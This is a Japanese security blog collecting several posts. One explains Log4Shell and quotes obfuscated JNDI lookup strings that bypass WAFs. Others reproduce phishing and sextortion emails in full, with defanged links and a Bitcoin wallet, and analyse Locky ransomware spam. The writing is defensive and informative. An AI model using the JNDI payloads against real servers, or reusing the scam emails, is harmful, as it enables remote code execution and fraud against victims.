ども。こんばんは。

週末にビッグな脆弱性の話題が飛び込んできました。

通称log4shellと呼ばれるこの脆弱性はApache Log4j 2.15.0より前の2系のバージョンに影響があるとされています。

サーバサイドはじめ多くのJavaで書かれたプログラムに影響するのではないでしょうか。

【参考】

• 「やばすぎる」　Javaライブラリ「Log4j」にゼロデイ脆弱性、任意のリモートコードを実行可能　iCloudやSteam、Minecraftなど広範囲のJava製品に影響か
• Apache Log4jの任意のコード実行の脆弱性（CVE-2021-44228）に関する注意喚起

この脆弱性の厄介なところは、外部からクラスファイルを読み込めてしまうことによる影響と内部のロギングに利用していることで、影響範囲が膨大なところではないでしょうか。
例えばデバッグ目的でユーザからの入力をログに出したりするようなケース…ありえすぎる…

脆弱性のあるlog4jにとある文字列が渡されることで、JNDIという機能を通じて外部のladp/ldapsサーバ、dnsサーバ、rmiサーバと通信してしまう、更にladp(だけ？)サーバの応答を細工することでクラスファイルを読んで実行してしまうようです。
※ldapじゃなくてdnsにするとdnsクエリが飛びます。脆弱性が有効か試す上ではdnsが利用される可能性もありますね。

JNDI Lookupについて調べてみると「jndi:ldap」という感じの文字列が含まれるのでこれをWAFとかで弾いちゃえばいいじゃん、という気がしますが、そんなに単純でも無いようで、もうちょっと考えないとWAF やIPSが比較的簡単にバイパスされる恐れがあります。

以下参考ツイート。

${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}

log4j bypass lol

Lessons learned: Don't use Java.

— stypr (@stereotype32) December 10, 2021

実際に以下のサイトを参考においらもdocker上で脆弱なspring-bootを使ってテストしてみました。

https://github.com/christophetd/log4shell-vulnerable-app

参考ツイートはもちろん、こんな感じでもexploitは成立しました。
※別で用意したサーバにちゃんとldap通信が飛んできました。

${lower:j}ndi:ldap〜

現在各セキュリティ製品ベンダーから続々と対応するシグネチャが出ていると思います。

上記のようなパターンにも対応できているのかは要確認だと思われます。(実際においらは検証しましたが細かくは書きません…)

log4jの対策済みバージョンへの更新はもちろんですが、上記のようなバイパスの可能性はあるとしても、IPSやWAFがある場合は、シグネチャを有効化しておくことに越したことはないとは思います。今後上記のようなパターンに対応してくる可能性もあると思いますので。

【追記】
ちなみに、影響を少しでも抑えるという意味では、ファイアウォールやiptables/firewalldなんかで不要なLDAP通信を遮断するのも有効ではないかと思われます。そもそもインターネット直抜けでLDAP通信なんてそんなに無いだろうし、あったとしても宛先が限定できると思います。

クラウドとかだとアウトバウンド方向の通信の制御は最近あまりしない気もしますが、一昔前だと割と外向きもファイアウォールで制御してた気がするんですよね。
今回エクスプロイトが成立するかのチェックにDNSが使われるケースがありますが、DNSも本来であれば設定されたDNSサーバ以外のDNSサーバへの通信は塞いでおけばという気もします。
※昔気質の「DMZ」があるイメージのとあるネットワーク屋の感想ですが。。。

ではでは。またの機会に。

ども。こんばんは。

手元に届いたフィッシングメールや面白そうなメールを気が向いたときに投稿するセキュリティねたのコーナーです。

今回もすべてYahoo!メールのスパムフィルタで迷惑メール判定されています。

■JCBを騙るフィッシング(2019/12/03)

Recieveヘッダ

Received: from 193.47.34.141 (EHLO alias28s190314.cloud.flynet.pro) (193.47.34.141)
by mta035.mail.bbt.yahoo.co.jp with SMTP; Tue, 03 Dec 2019 04:56:49 +0900
Received: from [112.48.9.111] (helo=xwyvebu)
by s190314.cloud.flynet.pro with esmtpsa

メール内容

From: MyJCB <mail@qa.jcb.co.jp>
To: xxxx <xxxx@yahoo.co.jp>
Subject: 【重要】お客様の【MyJCBカード】が第三者に利用される恐れがあります。
X-Mailer: Microsoft Outlook 16.0

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
本メールはJCBカードのご利用にあたっての、大切なご連絡事項です。
そのため、「JCBからのお知らせメール配信」を「希望しない」に
設定しているお客様へもお送りしています。
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

いつもJCBカードをご利用いただきありがとうございます。

弊社では、お客様に安心してカードをご利用いただくことを目的に、
第三者による不正使用を防止するモニタリングを行っています。

このたび、弊社の不正検知システムにおいて、現在、お客様がお持ちの
JCBカードのご利用内容について、第三者による不正使用の可能性を
検知しましたので、ご連絡を差しあげました。

お忙しいところ大変恐れ入りますが、下の【お問い合わせ窓口】まで、
なお、ご契約いただいているカードについては、第三者による不正使用の
可能性がございますので、カードのご利用を一時的に停止させていただいている、
もしくは今後停止させていただく場合がございます。

ご不便とご心配をおかけしまして誠に申し訳ございませんが、
何とぞご理解賜りたくお願い申しあげます。

至急、MYJCBサービスに修正情報を再登録してください

https:my.jcb.co.jp/Login&ibi=jp.co.jcb.my&isi=1097001344&apn=jp.co.jcb.my 

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
弊社におけるセキュリティー対策について

弊社では、カードの不正使用を未然に防ぐためにさまざまなセキュリティー
対策を実施しており、今回のご案内も未然防止策のひとつです。
詳細は弊社ホームページ：「安心してご利用いただくために」をご参照ください。

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

今後ともJCBカードをご愛用くださいますようお願い申しあげます。
■本件に関するお問い合わせ
│株式会社ジェーシービー
│JCBインフォメーションセンター
│東京　0422-76-1700
│大阪　06-6941-1700
│福岡　092-712-4450
│札幌　011-271-1411
｜※9:00AM?5:00PM  年中無休
｜※電話番号は、お間違いのないようおかけください。
｜※一部の電話機で利用できない場合があります。

リンク先は以下の通りでした。

hxxps://www[.]mzthys-mycqsarcb[.]xyz/

■相変わらずよく届くAmazonを騙るフィッシング(2019/12/12)

Receiveヘッダ

Received: from 104.148.4.211 (EHLO mail02.46f97e45a4aadacc.xyz) (104.148.4.211)
by mta033.mail.bbt.yahoo.co.jp with SMTP; Thu, 12 Dec 2019 05:44:47 +0900
Received: by mail01.46f97e45a4aadacc.xyz id hu5ak60f27s4

メール内容

Sender:account-update@amazon.co.jp
From: Amazon.co.jp <account-update@amazon.co.jp>
To: xxx <xxx@yahoo.co.jp>
Subject: 【重要】Аmazon. co. jp にご登録のアカウント（名前、パスワード、その他個人情報）の確認

Аmazon お客様   xxx@yahoo.co.jp

Аmazon に登録いただいたお客様に、Аmazon アカウントの情報更新をお届けします。
残念ながら、Аmazon のアカウントを更新できませんでした。
今回は、カードが期限切れになってるか、請求先住所が変更されたなど、さまざまな理由でカードの情報を更新できませんでした。

アカウント情報の一部が誤っている故に、お客様のアカウントを維持するため Аmazon アカウントの 情報を確認する必要があります。下からアカウントをログインし、情報を更新してください。
Аmazon ログイン

なお、24時間以内にご確認がない場合、誠に申し訳ございません、お客様の安全の為、アカウントの利用制限をさせていただきますので、予めご了承ください。

アカウントに登録のEメールアドレスにアクセスできない場合
お問い合わせ： Amazonカスタマーサービス。

お知らせ:パスワードは誰にも教えないでください。
個人情報と関係がなく、推測しにくいパスワードを作成してください。大文字と小文字、数字、および記号を必ず使用してください。
オンラインアカウントごとに、異なるパスワードを使用してください。

どうぞよろしくお願いいたします。
Аmazon

Аmazonですよ。AmazonじゃなくてАmazon。
AがА(キリル文字)になってます。

ログインアイコンのURLは以下の通りでした。

hxxps://www-amazon-co-jp[.]cbc737ce76d4ce7a94a5fc2e1951b9ba.buzz/?wuq7nxee8ifdvwys=uorfsjkb&tgnb05rv=xxx@yahoo.co.jp&zthd5mdyoyrezggr=oscjoj20191211xxx@yahoo.co.jp

■いっぱいきたLINEを騙るフィッシング(2019/12/03 ,12/01,11/30,11/29ほか)

Receiveヘッダ

Received: from 118.167.128.138 (EHLO kzvij.info) (118.167.128.138)
by mta092.mail.bbt.yahoo.co.jp with SMTP; Tue, 03 Dec 2019 09:26:29 +0900

メール内容

From: LINE <rnjcqsxa@kzvij.info>
To: xxx <xxx@yahoo.co.jp>
Subject: LINEにご登録のアカウント（名前、パスワード、その他個人情報）の確認 8:27:15
X-Mailer: Microsoft Outlook 16.0

お客様のLINEアカウントに異常ログインされたことがありました。お客様のアカウントの安全のために、ウェブページで検証してお願いします。

こちらのURLをクリックしてください。安全認証

hxxps://www[.]sdvagkysh[.]jp/gpoy/r9fth/for

この時、旧端末のLINEへ公式アカウント（LINE）から「他のスマートフォンであなたのアカウントが使用されようとしています」というメッセージが届きますが、もちろん自分で操作していることなので、そのまま手順を進めましょう。

※URLの安全認証有効期限は毎日8時から15時までです。

本文のURLがすでに怪しいのにリンク先はさらに怪しい。

hxxps://www[.]rhnkds[.]com/

掲載したメール以外の、本文のURLとリンクの組合わせは以下のようなものがありました。

hxxps://www[.]vsdvagkyshojn[.]com/gpoy/r9fth/forsde
→hxxps://www[.]roskco[.]com/

hxxps://www[.]cdvagkyshojn[.]com/gpoy/r9fth/forsd
→hxxps://www[.]tdwakuok[.]com/

hxxps://www[.]cdvagkyshojn[.]com/gpoy/r9fth/forsd
→hxxps://www[.]tdwakuok[.]com/

hxxps://www[.]gdvagkyshojn[.]com/gpoy/r9fth/forge
→hxxps://www[.]iowlpaw[.]com/

■こんにちは！さようなら！AVアラート(2019/11/18)

お前のとんでもない姿をカメラに収めたぞ的なやつ。

Receiveヘッダ

Received: from 77.65.69.134 (EHLO d69-134.icpnet.pl) (77.65.69.134)
by mta033.mail.bbt.yahoo.co.jp with SMTP; Mon, 18 Nov 2019 17:15:10 +0900

メール内容

From: <liqpubso@gaina.ne.jp>
To: <xxx@yahoo.co.jp>
Subject: AVアラート
X-Mailer: Microsoft Office Outlook 11
X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17514

こんにちは！

私のニックネームはeziechiele29です。
私は半年以上前にこのメールボックスをハッキングしました (あなたはこの手紙をあなたから受け取った),
私が作成したウイルス（トロイの木馬）をあなたのオペレーティングシステムに感染させ、あなたを長い間監視してきました。

その後もパスワードを変更したとしても、それは問題ではありません。私のウイルスはあなたのコンピュータ上のすべてのキャッシングデータを傍受しました
私のために自動的にアクセスを保存しました。

私はすべてのあなたのアカウント、ソーシャルネットワーク、電子メール、ブラウジング履歴にアクセスできます。
したがって、私はすべてのあなたの連絡先、あなたのコンピュータからのファイル、写真、ビデオのデータを持っています。

私はあなたが時折訪れる親密なコンテンツサイトに最も襲われました。
あなたは非常に野生の想像力を持っている、私はあなたに言う！

あなたの喜びと娯楽の間、私はあなたのデバイスのカメラを通して、あなたが見ているものと同期してスクリーンショットを撮りました。
何てことだ！ あなたはとても面白くて揺らめいています！

私はあなたの連絡先のすべてがこれらのスクリーンショットを取得するのを望まないと思いますよね？
もしあなたが同じ意見を持っていれば、私は805ドルが私が作った汚れを破壊するのにかなり公正な価格だと思います。

指定された金額を私のBTCウォレット（Bitcoin）に送ってください: 127eozs1DPZX4CtkPB3LrUAJ8RRvqUPJLd
上記の金額を受け取るとすぐに、私はデータが削除されることを保証します、私はそれを必要としません。

そうしないと、これらのファイルとサイト訪問の履歴があなたのデバイスからすべての連絡先に送信されます。
私はすべてのあなたの電子メールの対応を保存しました！ これはあなたの連絡先にも送信されます！

あなたがそれを読むとすぐに – 私はそれについて知るでしょう！
あなたは50時間持っています！

私はあなたのことを覗き込む多くの仕事をしてきました！ あなたはセキュリティを見ない!
実績のあるリソースだけに行き、どこにでもパスワードを入力しないでください！
さようなら！

ではでは。またの機会に。

ども。こんばんは。

雑記です。

■WF-1000Xファームウェア 2.0.0

何が修正されたのかイマイチ不明。

普通に更新完了。なんやかんや20分くらいかかった。

このアップデートには直接関係ないのですが、HTV33(HTC U11)は、Android 8.0アップデート時にAACに対応していた模様です。

そもそもAndroid 8.0でaptXとかのネイティブ対応というのがあるみたいですね。

全く気づいていませんでしたが、これを機にSBCからAACに変更しました。音質の違いはあんまりわからない。。。

あと、開発者モードを有効にするといろいろ設定できます。

■散財のコト

えーと、遅ればせながらCrosswalkのCDを買いに行きました。

そしたら思いの外散財しました。。。

鈴木みのり／Crosswalk/リワインド　¥1,404
LiSA／LiSA BEST -Day- ¥4.610(※)
LiSA／LiSA BEST -Day- ¥4.610(※)
映画『聲の形』 [Blu-ray Disc]　¥5.050(※)
打ち上げ花火、下から見るか?横から見るか? [Blu-ray Disc]　¥4,660(※)

中身の話より前に少し。
↑で※のついてる商品ですが、ヨドバシ.comほほうが安いです。
買うときに全く気づきませんでした。。。

【ヨドバシ,comの価格(2018/5/27 19時時点)】
LiSA／LiSA BEST -Day- ¥4.380(-¥230)
LiSA／LiSA BEST -Day- ¥4.380(-¥230)
映画『聲の形』 [Blu-ray Disc]　¥4,610(-¥440)
打ち上げ花火、下から見るか?横から見るか? [Blu-ray Disc]　¥4,560(-¥100)

合計でちょうど¥1.000違います。

うーん。わざわざ店舗行かなきゃ良かったという気持ちになってきますね。。。。
ちなみにヨドバシ.comで注文して店舗受取りだと、安い方の金額になるんだとか。(ちゃんと調べてませんが。。。)

皆さんもヨドバシで買い物するときは気をつけてくださいね。

前置きが長くなりましたが、それぞれちょっとだけご紹介です。

・鈴木みのり／Crosswalk/リワインド
やっと買いました！

あまんちゅ！盤は店頭在庫残り1でした！さくら盤はもう少し在庫があるみたい。
うーん、本当にいい曲ですね。みのり隊(オフィシャルファンクラブ)入ろかな・・・。

・LiSA BEST -Day- & -Way-

LiSAのベストアルバム！
それぞれ初回限定版でBD付きです。
完全のノリで買ってしまいました。。。
ただ、LiSAの曲で「best day, best way」が一番好きなので、まぁこれは仕方ないのですね。タイトルにされちゃうと。

・映画『聲の形』 [Blu-ray Disc]

これも完全にノリで買ってしまいました。
ただ、漫画が出た頃にちょっと読んだ記憶があり、気にはなっていました。
まだ見てないですが・・・。

・打ち上げ花火、下から見るか?横から見るか? [Blu-ray Disc]

これは普通にかいました。
岩井俊二監督の原作ドラマがあるそうですね。
Amazon Primeビデオで見ることができましたので、あわせて見ました。
オリジナルの「なずな」役は奥菜恵だったんですね。

アニメのなずなと同様、ちょっとだけ大人びた感じが出てていいですね。

興味のある方はどうぞ

打ち上げ花火、下から見るか？横から見るか？ – New Color Grading – 
http://amzn.asia/c7QaCSY

また、主題歌の「打上花火」と最後に流れる「Forever Friends」(※)はAmazon Musicで聞くことが出きます。
※オリジナルのREMEDIOS、アニメ版のDAOKOのカバーの両方とも聞けます。

うーん、Amazon Prime様様ですね。

内容はそこそこ楽しめました。

■ヨドバシ.comのドメインを間違えると・・・

おまけです。

さっき間違って「yodobasi.com」にアクセスしてしまったら、リダイレクトされて、偽警告に飛ばされてしまいました。

多分こんな感じでしょうか。

yodobasi[.]com
↓
ww8.yodobasi[.]com
↓
clearpe[.]com
↓
87a2f88080603249073f-e05297f9016588483c7a43eab27a61b0.r12.cf1.rackcdn[.]com

みなさんも気をつけてくださいね。
※多分OSとかブラウザみてると思うので、それぞれの環境ごとに表示は違うと思います。

余計なことせずに閉じれば大丈夫です。ビープ音が鳴るのでびっくりしますが。。。

ちなみに「e.tre456_worm_osx」で検索してみるといくつかヒットしますね。

参考：Macのsafariで怪しげなウイルス警告が出た｜toshiboo’s blog

最近こういう偽警告本当に多いです。まだちゃんと調べてないのですが、価格.comとかでも特定の広告クリックしてしまうと偽警告に飛ぶことがあるみたいです。
まとめサイトとかの広告なんかも偽警告にリダイレクトされるの多い気がしますね。

今度調べてみようかな。

ではでは。またの機会に。

ども。こんばんは。

不名誉なシリーズですが・・・。

おらのTwitterのアカウントが乗っ取られただよorz

おらのFacebookのカウントが乗っ取られただよorz

に続いてmixiが乗っ取られました。

見事にレイバン・・・ではなく、オークリーしました。オークリーってなんだ？有名なのかな？

やられた内容としては恐らく以下の２つ

・つぶやきへのスパム投稿
・マイミクへのスパムメッセージ送信

と思われます。久々に自分のmixiの糞痛ぇ自己紹介やアイタタな日記をみて萎え萎えですが、ちょっと調査しました。

しっかしアイコンも懐かしいですね。大阪日本橋のキャラクター？だったかな・・・。

そしてマイミクの皆さんごめんなさいm(_ _ m)

【つぶやき】

つぶやいちゃった内容はこんな感じ。(2018/5/11 18:22につぶやきました。)
※原文も途中で切れています。

まぁもうここ数年多方面からも言われてますが、結局これ使い回しが原因なんですよね。。

ブログには書いてませんでしたが、過去Yahooも同じパスワードでやられています笑
Yahooは2011年5月にやられてますね。まだその情報を使いまわしたリスト型攻撃がされてるんですかねー。

で、今回はどんな感じでやられたかを確認してみます。

mixiでの、セキュリティ関連の情報(ログイン履歴など)は、

設定変更→アカウントアクティビティから見ることができます。

こんな感じになっています。(黒塗りは自分です。

ログイン失敗は試した感じ記録されないようです。まぁ一発で入られたんだろうな。

)

ログイン元IPアドレス(2種類ありました)

2018/5/11 11:24
60[.]154[.]180[.]74  (softbank060154180074[.]bbtec[.]net)

2018/5/11 18:22←おそらくつぶやいた方
126[.]73[.]109[.]228 (softbank126073109228[.]bbtec[.]net)

まぁ、多分普通のPPPoE用のIPアドレスでしょうねぇ。

とりあえず、パスワードは変更しました。

ちなみに今回やられたメールアドレスで、パスワードの流出が調べられる「Have I Been Pwned」でチェックしてみると・・・

オーノーorz

皆さんも使いまわしはやめましょうね。

ではでは。またの機会に。

ーー追記ーー

今回は友人からの指摘で気づきましたが、こんなメールがちゃんと届いていました。

あと、そこそこ被害が報告されてますね。

mixiにリスト型攻撃: 独房の中

ども。こんばんわ。

久々にスパムネタ。

連続で7zの添付ファイル付きスパムが来ました。

結論両方ともvbsからのLockyでした。
拡張子が「.lukitus」になるLockyって最近流行りなんですかね？
別のマクロウイルスでもLockyがきてました。

一昨日くらいから増えた印象です。

ちょうどそのくらいからネットにも出回っていますね。
※うちのサーバにも最新っぽいマルウェアきててちょっとうれしい。

【関連情報】
Locky ransomware resurges with Diablo and Lukitus
https://www.webroot.com/blog/2017/08/17/locky-ransomware-resurges-diablo-lukitus/
http://www.zdnet.com/article/locky-ransomware-is-back-from-the-dead-again-with-new-diablo-variant/

一つ目

ファイル名:IMG_6939.7z
MD5:8e160db33127cd5bfe2f4bc08ca3fd8c
SHA1:ef234c0cbdffd032023985a9895ce98ac612da5c

7zを解凍すると以下のファイルが出て来る。
至って普通のダウンローダーって感じですね。

ファイル名：IMG_0109.vbs
MD5:dd4dfd04a5d9bea3852834612439c7bd
SHA1:8c00b7bb8dd4ad4f6520eacaf7540d9af703d10a

https://malwr.com/analysis/MDcxNjJkYmFlYmZkNGM5N2JmMDgwZTJiYmViNzQ4MTQ/

落としてくるファイルがこれ。

https://malwr.com/analysis/Y2ViM2QxMDhiY2VhNGVlZDliODg4ZWIwYzc5OTU3ZjY/

Malwrだとわかりにくいですが、こっちだとはっきり暗号化されてるのがわかりますね。

https://www.hybrid-analysis.com/sample/6d5d672d9e8402a4e6a2309c71443e93efccccee8f9959afc24ae9a89fe2935c?environmentId=100

これも、Lockyですね。拡張子を「.lukitus」にするタイプっぽいですねー。

https://www.virustotal.com/ja/file/6d5d672d9e8402a4e6a2309c71443e93efccccee8f9959afc24ae9a89fe2935c/analysis/

２つ目

同じくダウンローダーでした。
落としてくるファイルはこれみたい。

https://www.hybrid-analysis.com/sample/ee222c0b66961c8b10ab2f92af2872d72e369a4cb315b496b0343b6004c19eed?environmentId=100

これも、Lockyですね。拡張子を「.lukitus」にするタイプっぽいですねー。

なんで、7zなんだろう。

ではでは。またの機会に。